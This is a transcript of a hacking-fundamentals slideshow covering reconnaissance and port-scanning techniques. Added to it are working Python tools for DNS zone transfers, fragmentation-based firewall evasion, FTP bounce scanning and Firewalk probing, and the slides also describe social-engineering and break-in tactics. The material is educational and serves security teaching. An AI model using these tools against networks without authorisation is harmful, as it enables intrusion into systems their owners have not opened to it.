Hacking Fundamentals - Jen Johnson , Miria Grunick

From amiable_indian, 1 year ago

The fundamentals of Hacking - Jen Johnson , Miria Grunick

Slideshow transcript

Slide 1: The Fundamentals of Hacking: An 0/3r/!3vv Jen Johnson Miria Grunick

Slide 2: Five Phases of an Attack • Phase 1: Reconnaissance • Phase 2: Scanning • Phase 3: Gaining Access • Phase 4: Maintaining Access • Phase 5: Covering Tracks and Hiding

Slide 3: Phase 1: Reconnaissance • Takes place before the attack. • Investigate the target using publicly available information • Types: Low-Technology Reconnaissance, Searching the Web, Whois Databases, Using the DNS, and General Purpose Tools

Slide 4: Low-Technology Reconnaissance • Social Engineering: An attacker calls the target organization and fools an employee into revealing sensitive information. Often, the attacker calls and pretends to be a new employee, customer, system administrator, or business partner.

Slide 5: Low-Technology Reconnaissance • Physical Break-In: Physically breaking into the building to try to gain access to the network from the inside. This is often accomplished by walking into the building with a group of employees or being hired as an employee or temp.

Slide 6: Low-Technology Reconnaissance • Dumpster Diving: Going through an organization's discarded documents to find sensitive information. Employees often throw out papers that reveal critical information (e.g. old Post-It® notes with user IDs and passwords).

Slide 7: Searching the Web • Organization’s Web Site: Can reveal important information, such as the employees’ contact information, clues about the corporate culture and language, business partners, recent mergers and acquisitions, and what technologies the organization uses.

Slide 8: Searching the Web • Search Engines: Can reveal information about the company’s history, current events, future plans, financial status, business partners, technologies in use. • Usenet: Employees may submit questions to technical newsgroups that reveal information about the particular products that the organization uses.

Slide 9: Whois Databases • Whois databases contain information about the assignment of Internet addresses, domain names, registrars, and individual contacts. • First, find out who the registrar is. The Internet Network Information Center (InterNIC) whois database lists the registrar for .com, .net and .org domains when given the organization's name or domain name. It is available online at: www.internic.net/whois.html

Slide 10: Whois Databases • If you are researching an organization whose domain is not under .com, .net or .org (e.g. a country-code domain), try the Allwhois site at: www.allwhois.com/home.html • Once you have the registrar's name, go to the registrar's site for more information, such as names and phone numbers of administrators, e-mail and postal addresses, registration dates, and the addresses of the organization's DNS servers.

Slide 11: American Registry for Internet Numbers (ARIN) • Lists the IP address blocks allocated to an organization; search by company or domain name. Each regional registry answers only for its own region, so query the right one: • North American, Caribbean and (when this deck was written) South American and sub-Saharan African organizations: www.arin.net/whois/arinwhois.html (Latin America has since moved to LACNIC, www.lacnic.net, and Africa to AfriNIC, www.afrinic.net) • European organizations: www.ripe.net • Asia-Pacific organizations: www.apnic.net

Slide 12: Domain Name System (DNS) • DNS – a world-wide hierarchical database that stores information about domain names and IP addresses. This database is searched to get information about a given domain name, most commonly the corresponding IP address. • Once an attacker knows one of the DNS servers, the attacker can begin interrogating the name servers.

Slide 13: DNS • To interrogate DNS servers, run the nslookup program, which ships with UNIX and Windows NT/2000, by typing nslookup at the command prompt. • Try a zone transfer. In a zone transfer (AXFR), the client asks the DNS server to send every record it holds for a given zone.

Slide 14: DNS • To request a zone transfer, first point nslookup at the target's own name server with the server [target_DNS_server] command • Next, ask for every record type by typing set type=any • Initiate the zone transfer by typing ls -d [target_domain] • The output can reveal system names, their IP addresses, and sometimes even operating system types (from HINFO records or descriptive host names). • A properly configured server only allows AXFR from its own secondaries, so a refusal is the normal result; it is still worth noting, since a server that does answer hands over the whole internal naming scheme. • More information about nslookup: www.zoneedit.com/doc/nslookup.html
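As an added example (not part of the deck), the zone transfer that Slides 13 and 14 drive through nslookup, done by hand in Python with the standard library only: build the AXFR query, frame it for TCP, and parse the records that come back, including compressed names. The zone name, server and addresses in the constructed reply (example.com, 192.0.2.x) are illustrative; zone_transfer() talks to a real server and is the only part that needs a network.

```python
import socket
import struct

TYPE_A, TYPE_NS, TYPE_CNAME, TYPE_SOA, TYPE_PTR, TYPE_AXFR = 1, 2, 5, 6, 12, 252


def encode_name(name):
    """Wire form of a domain name: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    """Header (id, flags=0 for a plain query, one question) + question (zone, AXFR, IN)."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(zone) + struct.pack("!HH", TYPE_AXFR, 1)


def read_name(msg, off):
    """Decode a possibly compressed name (RFC 1035 4.1.4); returns (name, offset after it)."""
    labels, end = [], None
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:                 # pointer: two bytes here, continue elsewhere
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if n == 0:
            break
        labels.append(msg[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels) + ".", (end if end is not None else off)


def parse_message(msg):
    """Returns (rcode, [(owner, type, value)]) for every record in the three answer sections."""
    _txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                      # skip the echoed question
        _, off = read_name(msg, off)
        off += 4
    records = []
    for _ in range(an + ns + ar):
        owner, off = read_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == TYPE_A and rdlen == 4:
            value = socket.inet_ntoa(msg[off:off + 4])
        elif rtype in (TYPE_NS, TYPE_CNAME, TYPE_PTR, TYPE_SOA):
            value, _ = read_name(msg, off)   # for SOA only the primary name server is kept
        else:
            value = msg[off:off + rdlen].hex()
        records.append((owner, rtype, value))
        off += rdlen
    return flags & 0xF, records


def zone_transfer(server, zone, timeout=5.0):
    """AXFR over TCP (each message is prefixed by a 2-byte length); ends when the SOA appears twice."""
    q = build_axfr_query(zone)
    records, soa_count, buf = [], 0, b""
    with socket.create_connection((server, 53), timeout=timeout) as s:
        s.sendall(struct.pack("!H", len(q)) + q)
        while soa_count < 2:
            while len(buf) < 2 or len(buf) < 2 + struct.unpack("!H", buf[:2])[0]:
                chunk = s.recv(4096)
                if not chunk:
                    raise ConnectionError("server closed the transfer early")
                buf += chunk
            n = struct.unpack("!H", buf[:2])[0]
            msg, buf = buf[2:2 + n], buf[2 + n:]
            rcode, recs = parse_message(msg)
            if rcode != 0:                   # 5 = REFUSED is what a well-run server answers
                raise PermissionError("AXFR refused (rcode %d)" % rcode)
            records.extend(recs)
            soa_count += sum(1 for r in recs if r[1] == TYPE_SOA)
    return records


def constructed_axfr_reply(zone="example.com", txid=0x1234):
    """Hand-built single-message AXFR answer for offline use: SOA, NS, A, A, SOA. The zone name is
    reused through a compression pointer to offset 12, where the question name sits."""
    ptr = struct.pack("!H", 0xC000 | 12)

    def rr(owner, rtype, rdata):
        return owner + struct.pack("!HHIH", rtype, 1, 3600, len(rdata)) + rdata

    soa = encode_name("ns1." + zone) + encode_name("hostmaster." + zone) + struct.pack("!IIIII", 1, 7200, 900, 1209600, 3600)
    answers = (rr(ptr, TYPE_SOA, soa) + rr(ptr, TYPE_NS, encode_name("ns1." + zone))
               + rr(encode_name("ns1." + zone), TYPE_A, socket.inet_aton("192.0.2.53"))
               + rr(b"\x03www" + ptr, TYPE_A, socket.inet_aton("192.0.2.80")) + rr(ptr, TYPE_SOA, soa))
    return struct.pack("!HHHHHH", txid, 0x8400, 1, 5, 0, 0) + encode_name(zone) + struct.pack("!HH", TYPE_AXFR, 1) + answers
```

Against a live server, zone_transfer("ns1.example.com", "example.com") either returns the record list or raises PermissionError with rcode 5; the latter is the expected outcome against anything configured in the last two decades, and the same refusal is what nslookup's ls -d reports as "Query refused".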

Slide 15: General Reconnaissance Tools • Sam Spade (freeware available at www.samspade.org/ssw/ ) • Many reconnaissance tools in one: ping, whois, IP block whois, nslookup, dig, DNS zone transfer, traceroute, finger, SMTP VRFY, Web browser. • Other general-purpose reconnaissance tools: CyberKit, NetScan Tools, iNetTools

Slide 16: Web-Based Reconnaissance Tools • Research and attack portals: sites that allow a user to enter the target site and research or initiate an attack against the target (via denial-of-service attacks or vulnerability scans) • Difference between Web-based tools and general reconnaissance tools: the traffic now comes from the Web server, not the attacker's machine, so the target's logs show the portal's address. The attacker is more anonymous toward the target, although the portal operator can of course still log who asked.

Slide 17: Web-Based Reconnaissance Tools • Examples: www.network-tools.com privacy.net/analyze

Slide 18: Phase 2: Scanning The premise of scanning is to probe as many ports as possible, keeping track of open and useful ports that would be receptive to hacking. Scanners send multiple packets over a communication medium then listen and record each response. The following are techniques for inspecting ports and protocols.

Slide 19: War Dialing • War Dialing: Dialing large pools of telephone numbers in an effort to find unprotected modems. Done with an automated tool, such as THC-Scan 2.0, available at: www.thc.org/releases.php. • This tool will return a list of all of the modems discovered in the range of the phone numbers it was given. • The hacker can then check all of the modems and see if any have no passwords, allowing them access to the network.

Slide 20: FIN Probe • A FIN packet (or any packet without the ACK or SYN flag) is sent to an open port and one waits for a response. • The correct RFC 793 behaviour is not to respond. Many non-conforming implementations (e.g. Microsoft Windows) send a RST back, which is why this probe doubles as an OS fingerprinting test.

Slide 21: Network Mapping • A hacker first tries to determine which addresses have active hosts by pinging all possible addresses in the network. • Once a hacker knows which hosts are alive, he or she will try to determine the network topology. This is done by a method called tracerouting.

Slide 22: Network Mapping • Tracerouting: Send a series of packets with different Time-To-Live (TTL) values in the IP header and check the source address of the Time Exceeded message returned. • Example: Send a packet with a TTL of 1. The Time Exceeded message will have the source address of the first router. Now send a packet with a TTL of 2. The Time Exceeded message returned will have the source address of the second router, and so on.

Slide 23: Tracerouting

Slide 24: Network Mapping • Windows 2000/NT and UNIX have tools that do this for us • Windows 2000/NT: tracert • UNIX: traceroute • Another network mapping tool: Cheops (available at: www.marko.net/cheops ) This tool does the ping sweep and traceroute and draws a picture of the topology of the network.

Slide 25: Screenshot of Cheops

Slide 26: How Cheops Works • Sequentially sends ARP requests to every IP address in the range (ARP only reaches hosts on the local segment; remote ranges have to be swept with ICMP or TCP probes instead). • Traceroutes to every IP address that responds.

Slide 27: Scanning Involves 3 Steps • Locating Nodes • Performing Service Discoveries • Testing Services for Known Security Holes

Slide 28: TCP Port Scanning • Most basic form of scanning. Attempts to open a full TCP connection to each port to determine whether that port is active. • This method leaves an easier-to-spot trail than half-open (SYN) scanning, because the completed connection reaches the application and is usually logged.

Slide 29: Stealth Port Scanning • UNIX-like operating systems permit only the super-user to bind the ports numbered 0 to 1023 (Windows does not enforce this restriction). These well-known ports are assigned to services by the IANA (Internet Assigned Numbers Authority, www.iana.org). • Attempts by an unprivileged program to bind a port in the range 0..1023 will fail. A user program can bind any unallocated port higher than 1023.

Slide 30: • On Unix, the text file /etc/services (on Windows 2000, %windir%\system32\drivers\etc\services) lists these service names and the ports they use. Here are a few lines extracted from this file:

Slide 31: • echo 7/tcp Echo • ftp-data 20/tcp File Transfer (default data) • ftp 21/tcp File Transfer (control) • ssh 22/tcp SSH Remote Login Protocol • telnet 23/tcp Telnet • domain 53/udp Domain Name Server • www-http 80/tcp WWW HTTP

Slide 32: Non-Standard Ports • wins 1512/tcp Microsoft Windows Internet Name Service • radius 1812/udp RADIUS authentication protocol • yahoo 5010 Yahoo! Messenger • X11 6000-6063/tcp X Window System

Slide 33: Stealth Scanning Includes Some/All of the Following • Setting individual flags (ACK, FIN, RST, .. ) • NULL flags set • All flags set • Bypassing filters, firewalls, routers • Appearing as casual network traffic • Varied packet dispersal rates

Slide 34: Fragmented Packets • The scanner splits the TCP header into several IP fragments. This bypasses some packet filter firewalls because they cannot see a complete TCP header that can match their filter rules.

Slide 35: • Some packet filters and firewalls do queue and reassemble all IP fragments before filtering (e.g. the CONFIG_IP_ALWAYS_DEFRAG option in older Linux kernels enables this; later kernels reassemble automatically once connection tracking is loaded), but many networks cannot afford the performance cost of the queuing.

Slide 36: TCP Fragmenting • TCP fragmenting is not a scan method in itself; it is a way of obscuring a scan by splitting the TCP header across several small IP fragments.

Slide 37: • The smallest permissible first fragment carries 8 octets (64 bits) of the TCP header: the source and destination ports and the sequence number. The flags (SYN, FIN, ...) only arrive in the next fragment, and the remote host reassembles the header on arrival. A filter that judges each fragment on its own therefore never sees the flags together with the ports.

Slide 38: • The actual reassembly is performed by the receiving host's IP module (RFC 791's "internet protocol module"), which groups fragments that agree in their: – source address – destination address – protocol – identification field

Slide 39: Using TCP Fragmenting - FragRouter • Program which fragments TCP packets – 35 different ways to fragment • Called a router because it is a software implementation of a router – data from other programs is sent through the FragRouter • FragRouter fragments the packets and then forwards the packets to their destination
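The fragmentation trick of Slides 34 to 39, as an added example that is not part of the deck: split a constructed 20-byte TCP SYN header into 8-byte IP fragments the way nmap -f does, show that only the second fragment carries the flag byte (so a filter inspecting fragments one at a time cannot match "SYN to port 80"), and reassemble on the (src, dst, protocol, id) key the receiving host uses. Addresses and the IP identification value are made up for the demonstration.

```python
import socket
import struct

IP_MF = 0x2000          # "more fragments" bit in the flags/fragment-offset field


def ip_checksum(header):
    """RFC 791 one's-complement checksum over an IPv4 header."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def fragment_datagram(src, dst, proto, ident, payload, frag_size=8):
    """Split one IP payload (here a TCP header) into fragments of frag_size bytes.
    Offsets are counted in 8-byte units, so frag_size must be a positive multiple of 8."""
    if frag_size <= 0 or frag_size % 8:
        raise ValueError("fragment size must be a positive multiple of 8")
    fragments = []
    for start in range(0, len(payload), frag_size):
        chunk = payload[start:start + frag_size]
        more = start + frag_size < len(payload)
        flags_off = (IP_MF if more else 0) | (start // 8)
        hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(chunk), ident, flags_off,
                          64, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
        hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
        fragments.append(hdr + chunk)
    return fragments


def reassemble(fragments):
    """What the receiving IP module does: group by (src, dst, proto, id), order by offset, concatenate."""
    groups = {}
    for pkt in fragments:
        ver_ihl, _, total, ident, flags_off, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
        ihl = (ver_ihl & 0x0F) * 4
        groups.setdefault((src, dst, proto, ident), []).append(
            ((flags_off & 0x1FFF) * 8, bool(flags_off & IP_MF), pkt[ihl:total]))
    out = {}
    for key, parts in groups.items():
        parts.sort()
        data = b""
        for off, _more, chunk in parts:
            if off != len(data):
                raise ValueError("gap or overlap in fragments")
            data += chunk
        if parts[-1][1]:
            raise ValueError("last fragment missing")
        out[key] = data
    return out


def tcp_flags_in_fragment(fragment):
    """Flag bits if this fragment contains TCP header byte 13, else None: what a per-fragment filter sees."""
    ver_ihl, _, total, _, flags_off = struct.unpack("!BBHHH", fragment[:8])
    ihl = (ver_ihl & 0x0F) * 4
    start = (flags_off & 0x1FFF) * 8
    chunk = fragment[ihl:total]
    if start <= 13 < start + len(chunk):
        return chunk[13 - start] & 0x3F
    return None


# Constructed 20-byte TCP SYN header: sport 40000, dport 80, seq 1, flags SYN, window 1024 (no checksum)
SYN_HEADER = struct.pack("!HHIIHHHH", 40000, 80, 1, 0, (5 << 12) | 0x02, 1024, 0, 0)


def demo():
    """Fragment the SYN, report the flags visible per fragment, and check reassembly round-trips."""
    frags = fragment_datagram("10.0.0.1", "10.0.0.2", socket.IPPROTO_TCP, 0xBEEF, SYN_HEADER)
    key = (socket.inet_aton("10.0.0.1"), socket.inet_aton("10.0.0.2"), socket.IPPROTO_TCP, 0xBEEF)
    return len(frags), [tcp_flags_in_fragment(f) for f in frags], reassemble(frags)[key] == SYN_HEADER
```

demo() returns three fragments, flag visibility of [None, 2, None] (the SYN bit is only in the middle fragment) and True for the round trip. The evasion only works against a filter that does not reassemble; a stateful firewall that queues fragments, as Slide 35 describes, sees the whole header.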

Slide 40: SYN Scanning • Also called half-open scanning, as TCP connection is not completed. • A SYN packet is sent and the target host responds with a SYN+ACK, indicating the port is listening • RST indicates a non-listener • The server process is never informed by the TCP layer because the connection did not complete.

Slide 41: A demonstration of this technique shows a half-open transaction:
client -> SYN
server -> SYN|ACK
client -> RST

Slide 42: • This example has shown that the target port was open, since the server responded with SYN|ACK. • The RST is sent by the client's kernel, not by the scanner: no socket is expecting that SYN|ACK, so the TCP/IP stack resets the half-open connection automatically. The server-side application is never told anything, because the connection never completed.

Slide 43: Conversely, a closed port responds with RST|ACK:
client -> SYN
server -> RST|ACK
This combination of flags is indicative of a non-listening port.

Slide 44: FIN Scanning • The typical TCP scan attempts to open connections (at least part way). Another technique sends erroneous packets at a port, expecting that open listening ports will send back different error messages than closed ports.

Slide 45: • The scanner sends a FIN packet, which would normally close an open connection. Closed ports reply to an unexpected FIN with a RST. Open ports, on the other hand, ignore the packet. • If no service is listening at the target port, the operating system answers with a RST. • If a service is listening, the operating system silently drops the incoming packet. Therefore, silence suggests the presence of a service at the port.

Slide 46: This is the negotiation for open/closed port recognition:
client -> FIN
server -> (no reply)
No reply from the server is the sign of an open port: the server's operating system silently dropped the FIN destined for the service on that port. Note that a firewall dropping the probe produces exactly the same silence, so the honest reading is "open or filtered".

Slide 47: RST Reply • The opposite case is a RST reply from the server when a closed port is reached. • Since no service is bound to that port, the FIN provokes a reset (RST) from the server:
client -> FIN
server -> RST

Slide 48: • Other techniques include XMAS scans, which set several flags at once (nmap's version sets FIN, URG and PUSH), and NULL scans, where no flag bits are set. Different operating systems respond differently to these probes, so it becomes important to identify the OS, and even its version and patch level, before interpreting the results.

Slide 49: Reverse Ident Scanning • This technique issues a query to the ident/auth daemon, usually on port 113, asking for the owner of the process behind a TCP connection. Because ident only reports on established connections, the scanner first completes a connection to the target port and then asks ident who owns it. • The main reason behind this is to find daemons running as root; such a result would entice an intruder to look for an exploitable overflow in that service.

Slide 50: • Alternatively, a daemon running as user nobody (httpd) may not be as attractive to a user because of limited access privileges. • identd could release miscellaneous private information such as: – user info – entities – objects – processes

Slide 51: FTP Bounce

Slide 52: Background • An FTP session consists of two connections between the client and the server: the control connection and a data connection. • In active mode the client listens on a high-numbered port and the server connects back to it to send data. • When the client wants to transfer data to or from the server, it issues a PORT command. The PORT command tells the server which address and port to open the data connection to, and nothing in the original protocol required that address to be the client's own.

Slide 53: Problem • An outside attacker can use the FTP server to open connections which appear to originate from the server. This can be used to bypass access control restrictions that trust the server's address.

Slide 55: How To Use FTP Bounce Attacks

Slide 56: Port Scanning • An attacker can run the attack from a third-party FTP server acting as a stage for the scan. The victim site sees the scan as coming from the FTP server rather than the true source (the FTP client). • When the victim site is on the same subnet as the FTP server, or when it does not filter traffic from the FTP server, the attacker can use the server machine as the source of the port scan rather than the client machine.

Slide 57: Bypassing Basic Packet Filtering Devices • An attacker may bypass a firewall in certain network configurations. – Example: a site has its anonymous FTP server behind a firewall. Using the technique above, an attacker determines that an internal web server at that site is available on port 8080, a port normally blocked by the firewall.

Slide 58: • By connecting to the public FTP server at the site, the attacker makes the FTP server open a further connection to an arbitrary port on a non-public machine at that site (for instance the internal web server at port 8080). • As a result, the attacker reaches a machine that would otherwise be protected by the firewall.

Slide 59: Bypassing Dynamic Packet Filtering Devices • Example – victim site houses all of its systems behind a firewall that uses dynamic packet filters – person at victim site browses web pages and downloads a Java applet constructed by attacker. – Java applet then opens an outbound FTP connection to attacker's machine. – applet then issues an FTP PORT command, instructing server machine to open a connection to some otherwise protected system behind the victim firewall.

Slide 60: • The dynamic packet filtering firewall examines outbound packets to determine whether any action is required on its part. • It notes the PORT command and allows an incoming connection from the attacker's remote server to the telnet port on the victim machine. • The connection is allowed because the PORT command was issued by a client on the inside.
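The bounce scan of Slides 52 to 58 in code, as an added example that is not part of the deck: log in to an FTP server, point its data connection at a third-party address with PORT, and read the port state off the server's reply to LIST. Reply 150/125 means the server reached the target port (open); 425 means the data connection failed (closed); a non-200 answer to PORT means the server refuses third-party addresses, which is the RFC 2577 fix. The control channel is scripted with canned replies so the logic runs offline; bounce_scan() is the live version, against a server you are authorised to use.

```python
import io
import socket


def port_argument(ip, port):
    """PORT h1,h2,h3,h4,p1,p2: the address the server should connect to, port as p1*256 + p2."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    return "%s,%d,%d" % (ip.replace(".", ","), port >> 8, port & 0xFF)


def read_reply(f):
    """One FTP reply, including the multi-line 'xyz-' form (RFC 959 4.2); returns (code, last line text)."""
    line = f.readline()
    if not line:
        raise ConnectionError("control connection closed")
    text = line.decode("latin-1").rstrip("\r\n")
    code = text[:3]
    if text[3:4] == "-":                           # continuation lines until 'xyz ' reappears
        while not text.startswith(code + " "):
            text = f.readline().decode("latin-1").rstrip("\r\n")
    return int(code), text[4:]


def bounce_probe(ctrl, target_ip, target_port, user=b"anonymous", password=b"probe@example.invalid"):
    """Log in, aim the data connection at target_ip:target_port, issue LIST and interpret the outcome."""
    f = ctrl.makefile("rb")
    code, _ = read_reply(f)
    if code != 220:
        raise RuntimeError("unexpected greeting %d" % code)
    ctrl.sendall(b"USER " + user + b"\r\n")
    code, _ = read_reply(f)
    if code == 331:
        ctrl.sendall(b"PASS " + password + b"\r\n")
        code, _ = read_reply(f)
    if code != 230:
        raise PermissionError("login failed (%d)" % code)
    ctrl.sendall(("PORT %s\r\n" % port_argument(target_ip, target_port)).encode("ascii"))
    code, _ = read_reply(f)
    if code != 200:
        return "bounce refused"                    # server rejects third-party PORT addresses
    ctrl.sendall(b"LIST\r\n")
    code, _ = read_reply(f)
    if code in (125, 150):                         # data connection opened: target port accepted it
        read_reply(f)                              # consume the closing 226
        return "open"
    if code == 425:                                # "Can't open data connection": target refused
        return "closed"
    return "unknown (%d)" % code


class ScriptedControlChannel:
    """Constructed stand-in for a connected control socket: canned replies in order, sent data recorded."""

    def __init__(self, replies):
        self.sent = []
        self._reader = io.BytesIO(b"".join(replies))

    def sendall(self, data):
        self.sent.append(data)

    def makefile(self, mode):
        return self._reader


LOGIN = [b"220-Welcome\r\n220 FTP ready\r\n", b"331 Password please\r\n", b"230 Logged in\r\n"]
OPEN_PORT_SCRIPT = LOGIN + [b"200 PORT command successful\r\n",
                            b"150 Opening ASCII mode data connection\r\n", b"226 Transfer complete\r\n"]
CLOSED_PORT_SCRIPT = LOGIN + [b"200 PORT command successful\r\n", b"425 Can't open data connection\r\n"]
REFUSED_SCRIPT = LOGIN + [b"500 Illegal PORT command\r\n"]


def bounce_scan(ftp_server, target_ip, ports):
    """Live use (not exercised here): one control session per probed port."""
    results = {}
    for port in ports:
        with socket.create_connection((ftp_server, 21), timeout=10) as ctrl:
            results[port] = bounce_probe(ctrl, target_ip, port)
    return results
```

nmap's -b option does the same with a single session and many PORT/LIST pairs; the scripted channel above shows the minimum the scanner must parse, including the multi-line banner that trips up naive "read one line" code.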

Slide 61: Scanning Packages Available Commercially • CyberCop • JAKAL • NetRecon • NMap

Slide 62: CyberCop • The CyberCop Monitor component is an intrusion detection system that safeguards corporate assets by performing real-time surveillance of network traffic, acting as a "high tech burglar alarm" that alerts companies when their network is breached by unauthorized intruders. The scanning package in the same product family is CyberCop Scanner.

Slide 63: JAKAL • Developed on UNIX to test UNIX hosts. Jakal is interesting because of its possibilities: it is designed for stealth and to go through most firewalls. Usually it doesn't leave any trace of its activity, except for some messages (SYN|ACK).

Slide 64: NetRecon • Scans multiple operating systems, including UNIX, Linux, Windows 2000, Windows NT, Windows 95/98 and NetWare. • Scans using many Windows NT/2000 network protocols such as TCP/IP, IPX/SPX, and NetBEUI.

Slide 65: Nmap • Most popular scanner to date • Free utility for network exploration or security auditing. Designed to rapidly scan large networks. Uses raw IP packets to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use. • http://www.insecure.org/nmap/idlescan.html

Slide 66: Scan Types Supported by Nmap

Slide 67: Type of Scan | Command-Line Option | Summary of Characteristics
• TCP Connect | -sT | Completes the 3-way handshake with each scanned port.
• TCP SYN | -sS | Only sends the initial SYN and awaits the SYN-ACK response.
• TCP FIN | -sF | Sends a TCP FIN to each port. Reset indicates port is closed.

Slide 68:
• TCP Xmas Tree | -sX | Sends packet with the FIN, URG and PUSH code bits set. Reset indicates port is closed.
• Null | -sN | Sends packets with no code bits set. Reset indicates port is closed.
• TCP ACK | -sA | Sends packet with the ACK code bit set to each target port.
• Window | -sW | Similar to ACK, but focuses on TCP window size to determine if ports are

Slide 69:
• FTP Bounce | -b | Bounces a TCP scan off of an FTP server, obscuring the originator of the scan.
• UDP Scanning | -sU | Sends a UDP packet to target ports to determine if a UDP service is listening.
• Ping | -sP | Sends ICMP echo request packets to every machine on the target network.
• RPC Scanning | -sR | Uses every open TCP/UDP port discovered on the target to send RPC NULL commands, identifying RPC services.

Slide 70: Determining Firewall Filter Rules • One disadvantage of Nmap, at least in its basic scan modes: it cannot differentiate between a port that is closed on the end machine and one that is being firewalled (the ACK scan and the "filtered" state narrow this down, but do not map the filter's rules). • It is also important to determine what ports are available through the firewall or router. One tool that can do this is Firewalk (available: www.packetfactory.net/projects/firewalk/firewalk-5.0.tgz). • Firewalk can determine which types of packets are permitted through and which ports are accessible through the firewall. • Note: Firewalk is only useful for packet-filtering devices, not proxy-based firewalls.

Slide 71: How Firewalk Works • Determines the number of hops between the tool and the firewall • Sends UDP and TCP packets with TTL one greater than the hop count to the filtering device. – If ICMP Time Exceeded message is returned, the port is available through the firewall – If ICMP Port Unreachable message or nothing is returned, the port is most likely being filtered by the firewall. • Unlike Nmap, Firewalk can determine what kind of packets are allowed through the firewall for each specific port and which ports allow new connections.
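Both the traceroute loop of Slide 22 and the Firewalk test of Slide 71 are built on the same primitive, a probe sent with a chosen TTL and the ICMP message it provokes. The following added example (not from the deck) implements both on top of one probe function. udp_probe_factory() is the live probe (raw ICMP socket, needs root); simulated_probe() is a constructed network with made-up addresses so that the two algorithms can be run offline, including the mistake of getting the gateway hop count wrong.

```python
import socket

TIME_EXCEEDED = (11, 0)     # ICMP type 11 code 0: TTL expired in transit
PORT_UNREACHABLE = (3, 3)   # ICMP type 3 code 3: reached the host, no listener on that UDP port


def udp_probe_factory(dest_ip, timeout=2.0):
    """Live probe (root required; not exercised offline): send an empty UDP datagram with the given
    TTL and return (responder_ip, (icmp_type, icmp_code)), or (None, None) on silence."""
    def probe(ttl, port=33434):
        rx = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        tx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            rx.settimeout(timeout)
            tx.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl)
            tx.sendto(b"", (dest_ip, port))
            pkt, (addr, _) = rx.recvfrom(1024)   # simplification: assumes the first ICMP seen is ours
            ihl = (pkt[0] & 0x0F) * 4
            return addr, (pkt[ihl], pkt[ihl + 1])
        except socket.timeout:
            return None, None
        finally:
            rx.close()
            tx.close()
    return probe


def traceroute(probe, max_hops=30):
    """Slide 22: raise the TTL one hop at a time; each Time Exceeded names the next router.
    Stops at the first Port Unreachable, which comes from the destination itself."""
    path = []
    for ttl in range(1, max_hops + 1):
        addr, icmp = probe(ttl)
        path.append(addr)                         # None marks a hop that stayed silent
        if icmp == PORT_UNREACHABLE:
            break
    return path


def firewalk(probe, gateway_hops, ports):
    """Slide 71: TTL = gateway hop count + 1. If the filter forwards the probe it expires one hop
    past the gateway and a Time Exceeded comes back; silence (or anything else) means it was dropped."""
    return {port: ("open" if probe(gateway_hops + 1, port)[1] == TIME_EXCEEDED else "filtered")
            for port in ports}


def simulated_probe(routers, gateway_hop, filtered_ports, destination):
    """Constructed stand-in for a live probe: routers[i] answers for hop i+1, the router at
    gateway_hop drops filtered_ports when forwarding, and destination sits past the last router."""
    def probe(ttl, port=33434):
        if ttl > gateway_hop and port in filtered_ports:
            return None, None                     # dropped by the gateway's filter
        if ttl <= len(routers):
            return routers[ttl - 1], TIME_EXCEEDED
        return destination, PORT_UNREACHABLE
    return probe


ROUTERS = ["10.0.0.1", "10.0.1.1", "192.0.2.1", "192.0.2.9"]   # made-up path; gateway is hop 3
DEST = "198.51.100.7"
```

With probe = simulated_probe(ROUTERS, 3, {23, 139}, DEST), traceroute(probe) walks the four routers and ends at DEST, and firewalk(probe, 3, [22, 23, 80, 139]) reports 23 and 139 as filtered. Run firewalk with gateway_hops=2 instead and port 23 comes back "open": the probe expires on the gateway itself, which answers Time Exceeded without ever consulting its filter. Getting the hop count right (the traceroute step) is therefore part of the technique, not a preliminary.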

Slide 72: Vulnerability Scanning • Use an automated tool that checks for common configuration errors, default configuration errors, and well-known system vulnerabilities. • Generally made up of multiple parts: vulnerability database, user configuration tool, scanning engine, knowledge base of the currently active scan, and a results repository and report generation tool.

Slide 73: Vulnerability Scanner

Slide 74: Nessus • The most popular of the vulnerability scanners. (Available: www.nessus.com) • Also allows the user to write their own vulnerability checks and include them in the tool. • Has a variety of plug-ins, such as checks for vulnerabilities that allow a shell to be gained remotely and checks for backdoor tools already installed on the target system.

Slide 75: Port, Socket & Service Vulnerability Penetrations Once a breach has been uncovered during the discovery phase, different vulnerability penetrations are used to take advantage and possibly gain control of computers, servers and internetworking equipment. More on exploiting these vulnerabilities in Phase 3……

Slide 76: Operating System Fingerprinting with Nmap

Slide 77: TCP ISN Sampling • The idea here is to find patterns in the initial sequence numbers chosen by TCP implementations when responding to a connection request. • Categorized into groups such as traditional 64K, random increments and true random, (Linux 2.0)

Slide 78: Don’t Fragment Bit • Trend of operating systems to set the IP “Don’t Fragment” bit on some of the packets they send. • By paying attention to this bit, one can glean information on the target OS.

Slide 79: TCP Initial Window • Simply involves checking the window size on returned packets. • Gives quite a lot of information since some operating systems can be uniquely identified by the window alone.

Slide 80: TCP Option • Excellent means of gaining access to leaked information. • Can discover if a host is implementing them by sending a query with an option set: target shows support of the option by setting it on the reply. • Can stuff many options on one packet to test everything at once.

